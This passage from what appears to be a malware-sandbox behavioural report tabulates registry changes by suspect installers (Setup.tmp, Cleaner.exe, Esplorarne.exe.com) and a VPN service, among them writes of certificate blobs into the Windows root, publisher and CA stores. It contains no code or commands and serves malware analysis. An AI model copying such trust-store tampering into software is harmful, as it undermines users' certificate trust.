| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{F92F7005-C230-498E-AF8D-A0635DC93F99} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{8384D9A8-37EB-49D2-8A0E-90232ADDEEEF} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d03000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e000000010000000800000000c0032f2df8d6010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce7f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007e000000010000000800000000c0032f2df8d60103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81 | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613c